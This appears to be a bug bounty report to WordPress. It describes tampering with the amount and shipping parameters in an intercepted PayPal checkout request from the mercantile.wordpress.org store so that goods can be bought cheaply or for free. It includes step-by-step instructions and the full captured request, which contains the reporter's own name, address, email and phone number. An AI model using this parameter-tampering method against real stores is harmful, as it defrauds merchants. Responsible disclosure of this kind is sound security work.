Parameter tampering : Price Manipulation of Products
W
WordPress
Submitted None
Actions:
Reported by
ashketchum
Vulnerability Details
Technical details and impact analysis
Hello Security Team,
I have found that you can buy any products in less amount or even we can say as free by changing the price of the product!!
POC :
1) go to https://mercantile.wordpress.org/
2) choose any product and add to cart
3) Now go to cart add your billing details
4) Intercept request with burpsuite and click on Proceed to Paypal
5) You will get the following request
REQUEST :
GET /cgi-bin/webscr?cmd=_cart&business=payments%40hellomerch.com&no_note=1¤cy_code=USD&charset=utf-8&rm=2&upload=1&return=https%3A%2F%2Fmercantile.wordpress.org%2Fcheckout%2Forder-received%2F10446%2F%3Fkey%3Dwc_order_5d642e2e80f33%26utm_nooverride%3D1&cancel_return=https%3A%2F%2Fmercantile.wordpress.org%2Fcart%2F%3Fcancel_order%3Dtrue%26order%3Dwc_order_5d642e2e80f33%26order_id%3D10446%26redirect%26_wpnonce%3Def9aba5f0f&page_style=&image_url=&paymentaction=sale&bn=WooThemes_Cart&invoice=WP-10446&custom=%7B%22order_id%22%3A10446%2C%22order_key%22%3A%22wc_order_5d642e2e80f33%22%7D¬ify_url=https%3A%2F%2Fmercantile.wordpress.org%2Fwc-api%2FWC_Gateway_Paypal%2F&first_name=ASHISH&last_name=DHONE&address1=I2IT+BOYS+HOSTEL+HINJAWADI+OPPOSITE+SYMBIOSIS+COLLEGE&address2=xss&city=PUNE&state=Maharashtra&zip=411057&country=IN&email=ha5ckdangerous5%40gmail.com&night_phone_b=7385711194&no_shipping=1&tax_cart=0.00&shipping_1=<<VULNERABLE PARAMETER>>&item_name_1=WordCamp+US+2018+T-Shirt+-+Women%27s+SM&quantity_1=1&amount_1=<<VULNERABLE PARAMETER>>&item_number_1=WP-WORDCAMPUS2018NAVY-WSM-05-106-B HTTP/1.1
Host: www.paypal.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: https://mercantile.wordpress.org/checkout/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Now here in this request we have two VULNERABLE PARAMETER as :
1) shipping_1
2) amount_1
Now you change amount to this parameter and forward the request .. you will be able to order the product for less price or even Free using Paypal !!
I have attached POC Video, Please take a look!!
Thank You!!
Ashish Dhone
## Impact
The attacker can reduce the price of the order and make a financial loss!!
Report Details
Additional information and metadata
State
Closed
Substate
Duplicate
Submitted
Weakness
Business Logic Errors